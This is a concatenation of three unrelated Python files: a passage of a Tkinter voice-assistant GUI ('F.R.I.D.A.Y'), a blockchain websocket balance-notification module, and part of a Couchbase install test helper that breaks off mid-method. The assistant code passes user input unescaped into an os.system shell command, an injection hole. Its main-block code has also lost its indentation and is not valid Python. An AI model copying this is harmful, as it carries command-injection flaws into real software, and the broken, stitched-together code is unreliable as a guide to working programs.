            # Runs the chosen game in a separate interpreter process.
            os.system(f"python -c \"import game; game.play('{text}')\"")
        return
    # --- coin toss / dice roll ---
    if isContain(text, ['coin','dice','die']):
        if "toss" in text or "roll" in text or "flip" in text:
            speak("Ok "+ownerDesignation, True, True)
            result = game.play(text)
            if "Head" in result: showSingleImage('head')
            elif "Tail" in result: showSingleImage('tail')
            else: showSingleImage(result[-1])
            speak(result)
            return
    # --- time & date ---
    if isContain(text, ['time','date']):
        speak(normalChat.chat(text), True, True)
        return
    if 'my name' in text:
        speak('Your name is, ' + ownerName, True, True)
        return
    # --- switch assistant voice ---
    if isContain(text, ['voice']):
        global voice_id
        try:
            if 'female' in text: voice_id = 0
            elif 'male' in text: voice_id = 1
            else:
                # No gender mentioned: just toggle the current voice.
                if voice_id==0: voice_id=1
                else: voice_id=0
            engine.setProperty('voice', voices[voice_id].id)
            ChangeSettings(True)
            speak("Hello "+ownerDesignation+", I have changed my voice. How may I help you?", True, True)
            assVoiceOption.current(voice_id)
        except Exception as e:
            print(e)
        return
    # --- greetings ---
    if isContain(text, ['morning','evening','noon']) and 'good' in text:
        speak(normalChat.chat("good"), True, True)
        return
    # --- fallback: small talk first, then a web search ---
    result = normalChat.reply(text)
    if result != "None": speak(result, True, True)
    else:
        speak("Here's what I found on the web... ", True, True)
        webScrapping.googleSearch(text)
##################################### DELETE USER ACCOUNT #########################################
def deleteUserData():
    """Confirm with the user, then wipe the stored face/user data and close the app."""
    answer = messagebox.askquestion('Alert', 'Are you sure you want to delete your Face Data ?')
    if answer == 'no':
        return
    messagebox.showinfo('Clear Face Data', 'Your face has been cleared\nRegister your face again to use.')
    import shutil
    shutil.rmtree('userData')
    root.destroy()
#####################
####### GUI #########
#####################
############ ATTACHING BOT/USER CHAT ON CHAT SCREEN ###########
def attachTOframe(text, bot=False):
    """Append a chat bubble for *text*: bot styling (left) or user styling (right)."""
    if bot:
        bubble = Label(chat_frame, text=text, bg=botChatTextBg, fg=botChatText,
                       justify=LEFT, wraplength=250, font=('Montserrat', 12, 'bold'))
        bubble.pack(anchor='w', ipadx=5, ipady=5, pady=5)
    else:
        bubble = Label(chat_frame, text=text, bg=userChatTextBg, fg='white',
                       justify=RIGHT, wraplength=250, font=('Montserrat', 12, 'bold'))
        bubble.pack(anchor='e', ipadx=2, ipady=2, pady=5)
def clearChatScreen():
    """Destroy every chat bubble currently packed into the chat frame."""
    for child in chat_frame.winfo_children():
        child.destroy()
### SWITCHING BETWEEN FRAMES ###
def raise_frame(frame):
    """Bring *frame* to the top of the stacked frames and reset the chat area."""
    frame.tkraise()
    clearChatScreen()
################# SHOWING DOWNLOADED IMAGES ###############
# Module-level image references: Tk only renders PhotoImages that stay referenced,
# so these must outlive the function call that creates them.
img0, img1, img2, img3, img4 = None, None, None, None, None
def showSingleImage(type, data=None):
    """Render a single image bubble in the chat frame.

    :param type: 'weather' (card with overlaid text), 'wiki' (downloaded thumb),
        'head'/'tail' (coin faces), or a die-face digit string.
    :param data: For 'weather' only: sequence of text fields to overlay on the card.
    """
    global img0, img1, img2, img3, img4
    try:
        # Thumbnail produced by webScrapping.downloadImage; may not exist yet.
        img0 = ImageTk.PhotoImage(Image.open('Downloads/0.jpg').resize((90,110), Image.ANTIALIAS))
    except:
        pass
    img1 = ImageTk.PhotoImage(Image.open('extrafiles/images/heads.jpg').resize((220,200), Image.ANTIALIAS))
    img2 = ImageTk.PhotoImage(Image.open('extrafiles/images/tails.jpg').resize((220,200), Image.ANTIALIAS))
    img4 = ImageTk.PhotoImage(Image.open('extrafiles/images/WeatherImage.png'))
    if type=="weather":
        weather = Frame(chat_frame)
        weather.pack(anchor='w')
        Label(weather, image=img4, bg=chatBgColor).pack()
        # Overlay the temperature/description fields on the card background.
        Label(weather, text=data[0], font=('Arial Bold', 45), fg='white', bg='#3F48CC').place(x=65,y=45)
        Label(weather, text=data[1], font=('Montserrat', 15), fg='white', bg='#3F48CC').place(x=78,y=110)
        Label(weather, text=data[2], font=('Montserrat', 10), fg='white', bg='#3F48CC').place(x=78,y=140)
        Label(weather, text=data[3], font=('Arial Bold', 12), fg='white', bg='#3F48CC').place(x=60,y=160)
    elif type=="wiki":
        Label(chat_frame, image=img0, bg='#EAEAEA').pack(anchor='w')
    elif type=="head":
        Label(chat_frame, image=img1, bg='#EAEAEA').pack(anchor='w')
    elif type=="tail":
        Label(chat_frame, image=img2, bg='#EAEAEA').pack(anchor='w')
    else:
        # Die faces live at extrafiles/images/dice/<digit>.jpg.
        img3 = ImageTk.PhotoImage(Image.open('extrafiles/images/dice/'+type+'.jpg').resize((200,200), Image.ANTIALIAS))
        Label(chat_frame, image=img3, bg='#EAEAEA').pack(anchor='w')
def showImages(query):
    """Download four images for *query* and display them in a 2x2 grid in the chat."""
    global img0, img1, img2, img3
    webScrapping.downloadImage(query)
    w, h = 150, 110
    # Container for the image grid.
    imageContainer = Frame(chat_frame, bg='#EAEAEA')
    imageContainer.pack(anchor='w')
    # Load the four downloaded thumbnails.
    photos = [
        ImageTk.PhotoImage(Image.open(f'Downloads/{i}.jpg').resize((w, h), Image.ANTIALIAS))
        for i in range(4)
    ]
    # Keep module-level references so Tk does not garbage-collect the images.
    img0, img1, img2, img3 = photos
    # Display them in a 2x2 grid.
    for i, photo in enumerate(photos):
        Label(imageContainer, image=photo, bg='#EAEAEA').grid(row=i // 2, column=i % 2)
############################# WAEM - WhatsApp Email ##################################
def sendWAEM():
    """Capture the popup entry as both e-mail and phone target, then close the popup."""
    global rec_phoneno, rec_email
    entered = WAEMEntry.get()
    rec_email = entered
    rec_phoneno = entered
    WAEMEntry.delete(0, END)
    appControl.Win_Opt('close')
def send(e):
    """<Return> key binding wrapper around sendWAEM (Tk passes an event argument)."""
    sendWAEM()
def WAEMPOPUP(Service='None', rec='Reciever'):
    """Modal popup that collects a WhatsApp number or e-mail address into WAEMEntry.

    Blocks in its own mainloop until sendWAEM() (button or <Return>) closes it.

    :param Service: 'WhatsApp' or 'Email' — selects the window title and icon.
    :param rec: Human-readable label for the kind of recipient requested.
    """
    global WAEMEntry
    PopUProot = Tk()
    PopUProot.title(f'{Service} Service')
    PopUProot.configure(bg='white')
    if Service=="WhatsApp": PopUProot.iconbitmap("extrafiles/images/whatsapp.ico")
    else: PopUProot.iconbitmap("extrafiles/images/email.ico")
    w_width, w_height = 410, 200
    s_width, s_height = PopUProot.winfo_screenwidth(), PopUProot.winfo_screenheight()
    x, y = (s_width/2)-(w_width/2), (s_height/2)-(w_height/2)
    PopUProot.geometry('%dx%d+%d+%d' % (w_width,w_height,x,y-30)) #center location of the screen
    Label(PopUProot, text=f'Reciever {rec}', font=('Arial', 16), bg='white').pack(pady=(20, 10))
    WAEMEntry = Entry(PopUProot, bd=10, relief=FLAT, font=('Arial', 12), justify='center', bg='#DCDCDC', width=30)
    WAEMEntry.pack()
    WAEMEntry.focus()
    SendBtn = Button(PopUProot, text='Send', font=('Arial', 12), relief=FLAT, bg='#14A769', fg='white', command=sendWAEM)
    SendBtn.pack(pady=20, ipadx=10)
    # Enter key submits just like the Send button.
    PopUProot.bind('<Return>', send)
    PopUProot.mainloop()
######################## CHANGING CHAT BACKGROUND COLOR #########################
def getChatColor():
    """Let the user pick a chat background color, apply it, and persist it.

    NOTE(review): this deliberately redefines (and corrects) the earlier
    getChatColor defined near the top of the file.
    """
    global chatBgColor
    myColor = colorchooser.askcolor()
    # askcolor() returns (rgb, hexstring); hexstring is None when cancelled.
    if myColor[1] is None: return
    chatBgColor = myColor[1]
    colorbar['bg'] = chatBgColor
    chat_frame['bg'] = chatBgColor
    root1['bg'] = chatBgColor
    ChangeSettings(True)
# 1 = voice bar visible, 0 = keyboard bar visible.
chatMode = 1
def changeChatMode():
    """Toggle the bottom bar between the voice-control and text-entry layouts."""
    global chatMode
    if chatMode==1:
        # appControl.volumeControl('mute')
        VoiceModeFrame.pack_forget()
        TextModeFrame.pack(fill=BOTH)
        UserField.focus()
        chatMode=0
    else:
        # appControl.volumeControl('full')
        TextModeFrame.pack_forget()
        VoiceModeFrame.pack(fill=BOTH)
        root.focus()
        chatMode=1
############################################## GUI #############################################
def onhover(e):
    """Show the 'change photo' overlay when the mouse enters the avatar button."""
    userPhoto['image'] = chngPh
def onleave(e):
    """Restore the normal avatar image when the mouse leaves."""
    userPhoto['image'] = userProfileImg
def UpdateIMAGE():
    """Run the avatar chooser script, then reload the avatar images shown in the UI."""
    global ownerPhoto, userProfileImg, userIcon
    # Blocks until the chooser script exits; it updates the stored user data.
    os.system('python ChooseAvatarPIC.py')
    u = UserData()
    u.extractData()
    ownerPhoto = u.getUserPhoto()
    userProfileImg = ImageTk.PhotoImage(Image.open("extrafiles/images/avatars/a"+str(ownerPhoto)+".png").resize((120, 120)))
    userPhoto['image'] = userProfileImg
    userIcon = PhotoImage(file="extrafiles/images/avatars/ChatIcons/a"+str(ownerPhoto)+".png")
def SelectAvatar():
    """Launch the avatar-update flow on a worker thread so the UI stays responsive."""
    Thread(target=UpdateIMAGE).start()
##################################### MAIN GUI ####################################################
#### SPLASH/LOADING SCREEN ####
def progressbar():
    """Animate the splash-screen progress bar from 0 to 100% (5% every 0.1s)."""
    s = ttk.Style()
    s.theme_use('clam')
    s.configure("white.Horizontal.TProgressbar", foreground='white', background='white')
    progress_bar = ttk.Progressbar(splash_root,style="white.Horizontal.TProgressbar", orient="horizontal",mode="determinate", length=303)
    progress_bar.pack()
    splash_root.update()
    progress_bar['value'] = 0
    splash_root.update()
    while progress_bar['value'] < 100:
        progress_bar['value'] += 5
        # splash_percentage_label['text'] = str(progress_bar['value']) + ' %'
        # Manual update() keeps the animation running without a mainloop.
        splash_root.update()
        sleep(0.1)
def destroySplash():
    """Tear down the splash window once the progress animation completes."""
    splash_root.destroy()
if __name__ == '__main__':
splash_root = Tk()
splash_root.configure(bg='#3895d3')
splash_root.overrideredirect(True)
splash_label = Label(splash_root, text="Processing...", font=('montserrat',15),bg='#3895d3',fg='white')
splash_label.pack(pady=40)
# splash_percentage_label = Label(splash_root, text="0 %", font=('montserrat',15),bg='#3895d3',fg='white')
# splash_percentage_label.pack(pady=(0,10))
w_width, w_height = 400, 200
s_width, s_height = splash_root.winfo_screenwidth(), splash_root.winfo_screenheight()
x, y = (s_width/2)-(w_width/2), (s_height/2)-(w_height/2)
splash_root.geometry('%dx%d+%d+%d' % (w_width,w_height,x,y-30))
progressbar()
splash_root.after(10, destroySplash)
splash_root.mainloop()
root = Tk()
root.title('F.R.I.D.A.Y')
w_width, w_height = 400, 650
s_width, s_height = root.winfo_screenwidth(), root.winfo_screenheight()
x, y = (s_width/2)-(w_width/2), (s_height/2)-(w_height/2)
root.geometry('%dx%d+%d+%d' % (w_width,w_height,x,y-30)) #center location of the screen
root.configure(bg=background)
# root.resizable(width=False, height=False)
root.pack_propagate(0)
root1 = Frame(root, bg=chatBgColor)
root2 = Frame(root, bg=background)
root3 = Frame(root, bg=background)
for f in (root1, root2, root3):
f.grid(row=0, column=0, sticky='news')
################################
######## CHAT SCREEN #########
################################
#Chat Frame
chat_frame = Frame(root1, width=380,height=551,bg=chatBgColor)
chat_frame.pack(padx=10)
chat_frame.pack_propagate(0)
bottomFrame1 = Frame(root1, bg='#dfdfdf', height=100)
bottomFrame1.pack(fill=X, side=BOTTOM)
VoiceModeFrame = Frame(bottomFrame1, bg='#dfdfdf')
VoiceModeFrame.pack(fill=BOTH)
TextModeFrame = Frame(bottomFrame1, bg='#dfdfdf')
TextModeFrame.pack(fill=BOTH)
# VoiceModeFrame.pack_forget()
TextModeFrame.pack_forget()
cblLightImg = PhotoImage(file='extrafiles/images/centralButton.png')
cblDarkImg = PhotoImage(file='extrafiles/images/centralButton1.png')
if KCS_IMG==1: cblimage=cblDarkImg
else: cblimage=cblLightImg
cbl = Label(VoiceModeFrame, fg='white', image=cblimage, bg='#dfdfdf')
cbl.pack(pady=17)
AITaskStatusLbl = Label(VoiceModeFrame, text=' Offline', fg='white', bg=AITaskStatusLblBG, font=('montserrat', 16))
AITaskStatusLbl.place(x=140,y=32)
#Settings Button
sphLight = PhotoImage(file = "extrafiles/images/setting.png")
sphLight = sphLight.subsample(2,2)
sphDark = PhotoImage(file = "extrafiles/images/setting1.png")
sphDark = sphDark.subsample(2,2)
if KCS_IMG==1: sphimage=sphDark
else: sphimage=sphLight
settingBtn = Button(VoiceModeFrame,image=sphimage,height=30,width=30, bg='#dfdfdf',borderwidth=0,activebackground="#dfdfdf",command=lambda: raise_frame(root2))
settingBtn.place(relx=1.0, y=30,x=-20, anchor="ne")
#Keyboard Button
kbphLight = PhotoImage(file = "extrafiles/images/keyboard.png")
kbphLight = kbphLight.subsample(2,2)
# --- Chat-mode toggle buttons ------------------------------------------------
# Keyboard icon shown in voice mode; the dark/light variant is chosen from the
# theme flag KCS_IMG (1 == dark). NOTE(review): kbphLight is presumably created
# earlier in the file — confirm.
kbphDark = PhotoImage(file = "extrafiles/images/keyboard1.png")
kbphDark = kbphDark.subsample(2,2)
if KCS_IMG==1: kbphimage=kbphDark
else: kbphimage=kbphLight
# Clicking either toggle button switches between voice and text chat modes.
kbBtn = Button(VoiceModeFrame,image=kbphimage,height=30,width=30, bg='#dfdfdf',borderwidth=0,activebackground="#dfdfdf", command=changeChatMode)
kbBtn.place(x=25, y=30)
#Mic
micImg = PhotoImage(file = "extrafiles/images/mic.png")
micImg = micImg.subsample(2,2)
micBtn = Button(TextModeFrame,image=micImg,height=30,width=30, bg='#dfdfdf',borderwidth=0,activebackground="#dfdfdf", command=changeChatMode)
micBtn.place(relx=1.0, y=30,x=-20, anchor="ne")
#Text Field
# Decorative background image plus the actual Entry widget on top of it.
TextFieldImg = PhotoImage(file='extrafiles/images/textField.png')
UserFieldLBL = Label(TextModeFrame, fg='white', image=TextFieldImg, bg='#dfdfdf')
UserFieldLBL.pack(pady=17, side=LEFT, padx=10)
UserField = Entry(TextModeFrame, fg='white', bg='#203647', font=('Montserrat', 16), bd=6, width=22, relief=FLAT)
UserField.place(x=20, y=30)
UserField.insert(0, "Ask me anything...")
# Enter key submits the typed query.
UserField.bind('<Return>', keyboardInput)
#User and Bot Icon
# Avatars used inside the chat transcript; index comes from the saved profile.
userIcon = PhotoImage(file="extrafiles/images/avatars/ChatIcons/a"+str(ownerPhoto)+".png")
botIcon = PhotoImage(file="extrafiles/images/assistant2.png")
botIcon = botIcon.subsample(2,2)
###########################
######## SETTINGS #######
###########################
settingsLbl = Label(root2, text='Settings', font=('Arial Bold', 15), bg=background, fg=textColor)
settingsLbl.pack(pady=10)
separator = ttk.Separator(root2, orient='horizontal')
separator.pack(fill=X)
#User Photo
# Profile picture doubles as the "change avatar" button.
userProfileImg = Image.open("extrafiles/images/avatars/a"+str(ownerPhoto)+".png")
userProfileImg = ImageTk.PhotoImage(userProfileImg.resize((120, 120)))
userPhoto = Button(root2, image=userProfileImg, bg=background, bd=0, relief=FLAT, activebackground=background, command=SelectAvatar)
userPhoto.pack(pady=(20, 5))
#Change Photo
# Hover overlay image; swapped in/out by the onhover/onleave handlers.
chngPh = ImageTk.PhotoImage(Image.open("extrafiles/images/avatars/changephoto2.png").resize((120, 120)))
userPhoto.bind('<Enter>', onhover)
userPhoto.bind('<Leave>', onleave)
#Username
userName = Label(root2, text=ownerName, font=('Arial Bold', 15), fg=textColor, bg=background)
userName.pack()
#Settings Frame
settingsFrame = Frame(root2, width=300, height=300, bg=background)
settingsFrame.pack(pady=20)
# Assistant voice selection (Female/Male), persisted via changeVoice.
assLbl = Label(settingsFrame, text='Assistant Voice', font=('Arial', 13), fg=textColor, bg=background)
assLbl.place(x=0, y=20)
n = StringVar()
assVoiceOption = ttk.Combobox(settingsFrame, values=('Female', 'Male'), font=('Arial', 13), width=13, textvariable=n)
assVoiceOption.current(voice_id)
assVoiceOption.place(x=150, y=20)
assVoiceOption.bind('<<ComboboxSelected>>', changeVoice)
voiceRateLbl = Label(settingsFrame, text='Voice Rate', font=('Arial', 13), fg=textColor, bg=background)
voiceRateLbl.place(x=0, y=60)
n2 = StringVar()
voiceOption = ttk.Combobox(settingsFrame, font=('Arial', 13), width=13, textvariable=n2)
voiceOption['values'] = ('Very Low', 'Low', 'Normal', 'Fast', 'Very Fast')
# Map the stored rate (100..300 in steps of 50) back to a combobox index 0..4.
voiceOption.current(ass_voiceRate//50-2) #100 150 200 250 300
voiceOption.place(x=150, y=60)
voiceOption.bind('<<ComboboxSelected>>', changeVoiceRate)
volumeLbl = Label(settingsFrame, text='Volume', font=('Arial', 13), fg=textColor, bg=background)
volumeLbl.place(x=0, y=105)
# Volume slider: engine volume is 0.0-1.0, the slider shows 0-100.
volumeBar = Scale(settingsFrame, bg=background, fg=textColor, sliderlength=30, length=135, width=16, highlightbackground=background, orient='horizontal', from_=0, to=100, command=changeVolume)
volumeBar.set(int(ass_volume*100))
volumeBar.place(x=150, y=85)
themeLbl = Label(settingsFrame, text='Theme', font=('Arial', 13), fg=textColor, bg=background)
themeLbl.place(x=0,y=143)
themeValue = IntVar()
s = ttk.Style()
s.configure('Wild.TRadiobutton', font=('Arial Bold', 10), background=background, foreground=textColor, focuscolor=s.configure(".")["background"])
darkBtn = ttk.Radiobutton(settingsFrame, text='Dark', value=1, variable=themeValue, style='Wild.TRadiobutton', command=changeTheme, takefocus=False)
darkBtn.place(x=150,y=145)
lightBtn = ttk.Radiobutton(settingsFrame, text='Light', value=2, variable=themeValue, style='Wild.TRadiobutton', command=changeTheme, takefocus=False)
lightBtn.place(x=230,y=145)
# Pre-select the radio button that matches the current theme flag.
themeValue.set(1)
if KCS_IMG==0: themeValue.set(2)
chooseChatLbl = Label(settingsFrame, text='Chat Background', font=('Arial', 13), fg=textColor, bg=background)
chooseChatLbl.place(x=0,y=180)
cimg = PhotoImage(file = "extrafiles/images/colorchooser.png")
cimg = cimg.subsample(3,3)
# Swatch showing the currently selected chat background colour.
colorbar = Label(settingsFrame, bd=3, width=18, height=1, bg=chatBgColor)
colorbar.place(x=150, y=180)
if KCS_IMG==0: colorbar['bg'] = '#E8EBEF'
Button(settingsFrame, image=cimg, relief=FLAT, command=getChatColor).place(x=261, y=180)
backBtn = Button(settingsFrame, text=' Back ', bd=0, font=('Arial 12'), fg='white', bg='#14A769', relief=FLAT, command=lambda:raise_frame(root1))
clearFaceBtn = Button(settingsFrame, text=' Clear Facial Data ', bd=0, font=('Arial 12'), fg='white', bg='#14A769', relief=FLAT, command=deleteUserData)
backBtn.place(x=5, y=250)
clearFaceBtn.place(x=120, y=250)
# Background workers: voice interaction loop and web-scraped data refresh.
# Failures are deliberately non-fatal so the GUI still starts offline.
try:
    # pass
    Thread(target=voiceMedium).start()
except:
    pass
try:
    # pass
    Thread(target=webScrapping.dataUpdate).start()
except Exception as e:
    print('System is Offline...')
root.iconbitmap('extrafiles/images/assistant2.ico')
# Show the main frame and enter the Tk event loop (blocks until window close).
raise_frame(root1)
root.mainloop()
|
utils.py | #!/usr/bin/python3
import json
import threading
import asyncio
import random
import sys
from .constants import *
from rpcutils import errorhandler as rpcErrorHandler, constants as rpcConstants
from wsutils.subscriptionshandler import SubcriptionsHandler
from . import apirpc
from logger import logger
def ensureHash(hashAddr):
    """Normalise a hash/address to lower case, prefixing '0x' when missing.

    Strings already starting with (lower-case) '0x' are only lower-cased;
    any non-string input is returned lower-cased as-is.
    """
    if not isinstance(hashAddr, str):
        return hashAddr.lower()
    # The prefix test runs on the original string, so '0X...' still gets a
    # '0x' prepended — mirrors the long-standing behaviour of this helper.
    return hashAddr.lower() if hashAddr.startswith('0x') else '0x' + hashAddr.lower()
def getMethodSchemas(name):
    """Return the (request, response) JSON-schema paths for RPC method *name*."""
    return (getRequestMethodSchema(name), getResponseMethodSchema(name))
def getRequestMethodSchema(name):
    """Build the path of the RPC request JSON schema for method *name*."""
    return "".join((RPC_JSON_SCHEMA_FOLDER, name, SCHEMA_CHAR_SEPARATOR, REQUEST, SCHEMA_EXTENSION))
def getResponseMethodSchema(name):
    """Build the path of the RPC response JSON schema for method *name*."""
    return "".join((RPC_JSON_SCHEMA_FOLDER, name, SCHEMA_CHAR_SEPARATOR, RESPONSE, SCHEMA_EXTENSION))
def getWSMethodSchemas(name):
    """Return the (request, response) JSON-schema paths for websocket method *name*."""
    return (getWSRequestMethodSchema(name), getWSResponseMethodSchema(name))
def getWSRequestMethodSchema(name):
    """Build the path of the websocket request JSON schema for method *name*."""
    return "".join((WS_JSON_SCHEMA_FOLDER, name, SCHEMA_CHAR_SEPARATOR, REQUEST, SCHEMA_EXTENSION))
def getWSResponseMethodSchema(name):
    """Build the path of the websocket response JSON schema for method *name*."""
    return "".join((WS_JSON_SCHEMA_FOLDER, name, SCHEMA_CHAR_SEPARATOR, RESPONSE, SCHEMA_EXTENSION))
def searchAddressesIntoBlock(data):
    """Scan a new-block notification for subscribed addresses and notify them.

    *data* is the raw JSON payload of a block-subscription message.
    Returns early (with a warning) when nothing is subscribed; raises
    BadRequestError when the payload is not valid JSON.
    """
    if not SubcriptionsHandler.coinInAddressSubscription():
        logger.printWarning("Coin not available in subscriptions handler")
        return
    if not SubcriptionsHandler.getSubscriptionsAvailable():
        logger.printWarning("There are no addresses subscribed for")
        return
    reqParsed = None
    try:
        reqParsed = json.loads(data)
    except Exception as e:
        logger.printError(f"Payload is not JSON message. Error: {e}")
        raise rpcErrorHandler.BadRequestError(f"Payload is not JSON message. Error: {e}")
    params = reqParsed[rpcConstants.PARAMS]
    blockNumber = params[rpcConstants.RESULT][NUMBER]
    logger.printInfo(f"Getting new block to check addresses subscribed for. Block number: {params[rpcConstants.RESULT][NUMBER]}")
    # The random int only serves as a (hopefully unique) JSON-RPC request id.
    block = apirpc.getBlockByNumber(
        random.randint(1, sys.maxsize),
        {
            BLOCK_NUMBER: blockNumber
        }
    )
    # NOTE(review): an address appearing in several transactions of the block
    # spawns one notify thread per match — confirm duplicate notifications
    # are acceptable to subscribers.
    for address in SubcriptionsHandler.getSubscriptionsAvailable():
        for transaction in block[TRANSACTIONS]:
            if address == transaction[FROM] or address == transaction[TO]:
                notifyThread = threading.Thread(target=notifyHandler, args=(address,), daemon=True)
                notifyThread.start()
def notifyHandler(args):
    """Thread entry point: run the async notify() for one address.

    Creates a private event loop for this thread (threads have no default
    loop), runs notify(*args*) to completion, and always closes the loop.

    :param args: the subscribed address to notify (single value, despite
        the generic name kept for caller compatibility).
    """
    loop = asyncio.new_event_loop()
    asyncio.set_event_loop(loop)
    try:
        loop.run_until_complete(notify(args))
    finally:
        # Close the loop even when notify() raises, so repeated notification
        # threads do not leak event loops / file descriptors.
        loop.close()
async def notify(address):
    """Fetch the current balance of *address* and push it to all subscribers.

    The balance is sent as a JSON string over each subscribed client's
    websocket connection.
    """
    addressClients = SubcriptionsHandler.getAddressClients(address)
    logger.printInfo(f"Getting balance for address subscribed for in new block. Address: {address}")
    # The random int only serves as a (hopefully unique) JSON-RPC request id.
    balance = apirpc.getAddressBalance(
        random.randint(1, sys.maxsize),
        {
            ADDRESS: address
        }
    )
    logger.printInfo("Sending balance to subscribers")
    for client in addressClients:
        await client.websocket.send_str(
            json.dumps(
                balance
            )
        )
|
install_utils.py | import getopt
import re
import subprocess
import sys
import threading
import time
sys.path = [".", "lib"] + sys.path
import testconstants
from remote.remote_util import RemoteMachineShellConnection, RemoteUtilHelper
from membase.api.rest_client import RestConnection
import install_constants
import TestInput
import logging.config
import os.path
logging.config.fileConfig("scripts.logging.conf")
log = logging.getLogger()
NodeHelpers = []
# Default params
params = {
"version": None,
"install_tasks": install_constants.DEFAULT_INSTALL_TASKS,
"url": None,
"debug_logs": False,
"cb_edition": install_constants.CB_ENTERPRISE,
"timeout": install_constants.INSTALL_TIMEOUT,
"all_nodes_same_os": False,
"skip_local_download": True,
"storage_mode": "plasma",
"disable_consistency": False,
"enable_ipv6": False,
"use_domain_names": False,
"fts_quota": testconstants.FTS_QUOTA,
"fts_query_limit": 0
}
class build:
    """Value object describing one Couchbase build artifact to install.

    Captures the binary name, its download URL, the local/remote file path
    and the product flavour; the version is taken from the globally parsed
    command-line ``params``.
    """

    def __init__(self, name, url, path, product="cb"):
        self.name, self.url, self.path = name, url, path
        self.product = product
        # Version string comes from the module-level parameter dict.
        self.version = params["version"]
class NodeHelper:
    """Per-server driver for the Couchbase install pipeline.

    Wraps one target node with its remote shell connection, OS info and the
    chosen build artifact, and exposes one method per pipeline stage
    (uninstall, install, init, cleanup).
    """

    def __init__(self, node):
        """Connect to *node*, detect its OS and pick root/non-root command sets."""
        self.node = node
        self.ip = node.ip
        self.params = params
        self.build = None
        self.queue = None
        self.thread = None
        self.rest = None
        self.install_success = False
        self.connect_ok = False
        self.shell = None
        self.info = None
        self.enable_ipv6 = False
        self.check_node_reachable()
        self.nonroot = self.shell.nonroot
        # Non-root installs use a different command table.
        self.actions_dict = install_constants.NON_ROOT_CMDS if self.nonroot else install_constants.CMDS

    def check_node_reachable(self):
        """Retry the SSH connection for up to 60s before giving up silently."""
        start_time = time.time()
        # Try 3 times
        while time.time() < start_time + 60:
            try:
                self.shell = RemoteMachineShellConnection(self.node, exit_on_failure=False)
                self.info = self.shell.extract_remote_info()
                self.connect_ok = True
                if self.connect_ok:
                    break
            except Exception as e:
                log.warning("{0} unreachable, {1}, retrying..".format(self.ip, e))
                time.sleep(20)

    def get_os(self):
        """Return a normalised OS identifier (e.g. 'centos7', '10.15' for macOS)."""
        os = self.info.distribution_version.lower()
        to_be_replaced = ['\n', ' ', 'gnu/linux']
        for _ in to_be_replaced:
            if _ in os:
                os = os.replace(_, '')
        if self.info.deliverable_type == "dmg":
            # macOS: keep only the major.minor part of the version string.
            major_version = os.split('.')
            os = major_version[0] + '.' + major_version[1]
        return os

    def uninstall_cb(self):
        """Remove any existing Couchbase Server installation from the node."""
        need_nonroot_relogin = False
        if self.shell.nonroot:
            # Uninstall needs root; temporarily re-login as root.
            self.node.ssh_username = "root"
            self.shell = RemoteMachineShellConnection(self.node, exit_on_failure=False)
            need_nonroot_relogin = True
        if self.actions_dict[self.info.deliverable_type]["uninstall"]:
            cmd = self.actions_dict[self.info.deliverable_type]["uninstall"]
            if "msi" in cmd:
                '''WINDOWS UNINSTALL'''
                # Kill CB processes first, then run the msi uninstaller for the
                # version read from VERSION.txt, and finally kill stray browsers.
                self.shell.terminate_processes(self.info, [s for s in testconstants.WIN_PROCESSES_KILLED])
                self.shell.terminate_processes(self.info, \
                        [s + "-*" for s in testconstants.COUCHBASE_FROM_VERSION_3])
                installed_version, _ = self.shell.execute_command(
                    "cat " + install_constants.DEFAULT_INSTALL_DIR["WINDOWS_SERVER"] + "VERSION.txt")
                if len(installed_version) == 1:
                    installed_msi, _ = self.shell.execute_command(
                        "cd " + install_constants.DOWNLOAD_DIR["WINDOWS_SERVER"] + "; ls *" + installed_version[
                            0] + "*.msi")
                    if len(installed_msi) == 1:
                        self.shell.execute_command(
                            self.actions_dict[self.info.deliverable_type]["uninstall"].replace("installed-msi",
                                                                                               installed_msi[0]))
                for browser in install_constants.WIN_BROWSERS:
                    self.shell.execute_command("taskkill /F /IM " + browser + " /T")
            else:
                # Unix: retry the uninstall command until it reports success
                # (stdout == ['1']) or the per-OS timeout elapses.
                duration, event, timeout = install_constants.WAIT_TIMES[self.info.deliverable_type]["uninstall"]
                start_time = time.time()
                while time.time() < start_time + timeout:
                    try:
                        o, e = self.shell.execute_command(cmd, debug=self.params["debug_logs"])
                        if o == ['1']:
                            break
                        self.wait_for_completion(duration, event)
                    except Exception as e:
                        log.warning("Exception {0} occurred on {1}, retrying..".format(e, self.ip))
                        self.wait_for_completion(duration, event)
            self.shell.terminate_processes(self.info, install_constants.PROCESSES_TO_TERMINATE)
        if need_nonroot_relogin:
            # Restore the original non-root login.
            self.node.ssh_username = "nonroot"
            self.shell = RemoteMachineShellConnection(self.node, exit_on_failure=False)

    def pre_install_cb(self):
        """Run pre-install steps; currently only macOS dmg (re)attachment."""
        if self.actions_dict[self.info.deliverable_type]["pre_install"]:
            cmd = self.actions_dict[self.info.deliverable_type]["pre_install"]
            duration, event, timeout = install_constants.WAIT_TIMES[self.info.deliverable_type]["pre_install"]
            if cmd is not None and "HDIUTIL_DETACH_ATTACH" in cmd:
                start_time = time.time()
                while time.time() < start_time + timeout:
                    try:
                        ret = hdiutil_attach(self.shell, self.build.path)
                        if ret:
                            break
                        self.wait_for_completion(duration, event)
                    except Exception as e:
                        log.warning("Exception {0} occurred on {1}, retrying..".format(e, self.ip))
                        self.wait_for_completion(duration, event)

    def install_cb(self):
        """Install the build on the node, retrying until success or timeout."""
        self.pre_install_cb()
        if self.actions_dict[self.info.deliverable_type]["install"]:
            if "suse" in self.get_os():
                cmd = self.actions_dict[self.info.deliverable_type]["suse_install"]
            else:
                cmd = self.actions_dict[self.info.deliverable_type]["install"]
            # Fill in the command template placeholders.
            cmd = cmd.replace("buildbinary", self.build.name)
            cmd = cmd.replace("buildpath", self.build.path)
            cmd = cmd.replace("mountpoint", "/tmp/couchbase-server-" + params["version"])
            duration, event, timeout = install_constants.WAIT_TIMES[self.info.deliverable_type]["install"]
            start_time = time.time()
            while time.time() < start_time + timeout:
                try:
                    o, e = self.shell.execute_command(cmd, debug=self.params["debug_logs"])
                    if o == ['1']:
                        break
                    self.wait_for_completion(duration, event)
                except Exception as e:
                    log.warning("Exception {0} occurred on {1}, retrying..".format(e, self.ip))
                    self.wait_for_completion(duration, event)
        self.post_install_cb()

    def post_install_cb(self):
        """Verify the install completed; optionally run per-OS retry commands."""
        duration, event, timeout = install_constants.WAIT_TIMES[self.info.deliverable_type]["post_install"]
        start_time = time.time()
        while time.time() < start_time + timeout:
            try:
                if self.actions_dict[self.info.deliverable_type]["post_install"]:
